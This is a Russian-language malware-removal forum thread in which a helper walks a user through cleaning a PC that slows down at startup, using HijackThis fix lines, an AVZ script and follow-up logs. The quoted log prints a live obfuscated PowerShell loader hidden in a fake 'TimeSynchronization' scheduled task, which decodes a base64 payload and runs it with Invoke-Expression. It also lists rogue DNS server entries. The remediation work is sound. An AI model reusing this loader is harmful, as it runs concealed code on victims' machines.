Junior Member
Вес репутации
20
Нужна помощь!
При запуске компьютер начинает жутко тормозить, и продолжается это до тех пор, пока не запустишь диспетчер задач.Краем глаза успеваю заметить что загрузка ЦП при этом снижается с 85 до 1.
Нашел несколько тем на вашем форуме, ближе всех оказалась вот эта:
https://virusinfo.info/showthread.php?t=219232
Однако, ничего из этого мне не помогло.
Лог прилагаетсяCollectionLog-2018.11.04-19.30.zip
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) SoulaRise , спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи .
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект .
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора) )и пофиксите только эти строки :
Код:
R3 - HKCU\..\URLSearchHooks: (no name) - {8dec4b69-27c4-405d-a37d-8d45c83f66ab} - (no file)
R3-32 - HKLM\..\URLSearchHooks: MadLen.uCoz.coM Toolbar - {8dec4b69-27c4-405d-a37d-8d45c83f66ab} - C:\Program Files (x86)\MadLen.uCoz.coM\tbMadL.dll
O2-32 - HKLM\..\BHO: MadLen.uCoz.coM Toolbar - {8dec4b69-27c4-405d-a37d-8d45c83f66ab} - C:\Program Files (x86)\MadLen.uCoz.coM\tbMadL.dll
O3-32 - HKLM\..\Toolbar: MadLen.uCoz.coM Toolbar - {8dec4b69-27c4-405d-a37d-8d45c83f66ab} - C:\Program Files (x86)\MadLen.uCoz.coM\tbMadL.dll
O4 - HKCU\..\Run: [GoogleUpdate] = C:\Users\Влад\AppData\Local\Google\Profile\service.exe (file missing)
O4 - MSConfig\startupreg: Coin [command] = C:\Users\Влад\AppData\Roaming\Images\image.exe (HKCU) (2017/10/21) (file missing)
O4 - User Startup: C:\Users\Влад\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\image.lnk -> C:\Users\Влад\AppData\Roaming\Images\image.exe
O17 - DHCP DNS 3: 172.93.96.62
O17 - DHCP DNS 4: 185.69.152.76
O17 - DHCP DNS 5: 139.60.163.48
O17 - HKLM\System\CCS\Services\Tcpip\..\{87643313-0FE2-4D33-84C9-9A76382506A1}: [NameServer] = 139.60.163.48
O17 - HKLM\System\CCS\Services\Tcpip\..\{87643313-0FE2-4D33-84C9-9A76382506A1}: [NameServer] = 172.93.96.62
O17 - HKLM\System\CCS\Services\Tcpip\..\{87643313-0FE2-4D33-84C9-9A76382506A1}: [NameServer] = 185.69.152.76
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{87643313-0FE2-4D33-84C9-9A76382506A1}: [NameServer] = 139.60.163.48
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{87643313-0FE2-4D33-84C9-9A76382506A1}: [NameServer] = 172.93.96.62
O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{87643313-0FE2-4D33-84C9-9A76382506A1}: [NameServer] = 185.69.152.76
O22 - Task: \Microsoft\Windows\Time Synchronization\TimeSynchronization - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber;$d = dec ([System.Convert]::FromBase64String('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')) ($obj.Model + ' ' + $obj.Serialnumber);Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($d))"
Перезагрузите систему.
Сделайте новый лог такой версией Autologger .
Сделайте лог Malwarebytes AdwCleaner .
Junior Member
Вес репутации
20
Вложения
Выполните скрипт в AVZ :
Код:
begin
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Влад^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^image.lnk','x64');
RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Discord','x64');
DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinDAT');
ExecuteWizard('SCU',2,2,true);
RebootWindows(false);
end.
Компьютер перезагрузится.
Проблема решена?
Junior Member
Вес репутации
20
Все работает. Спасибо большое.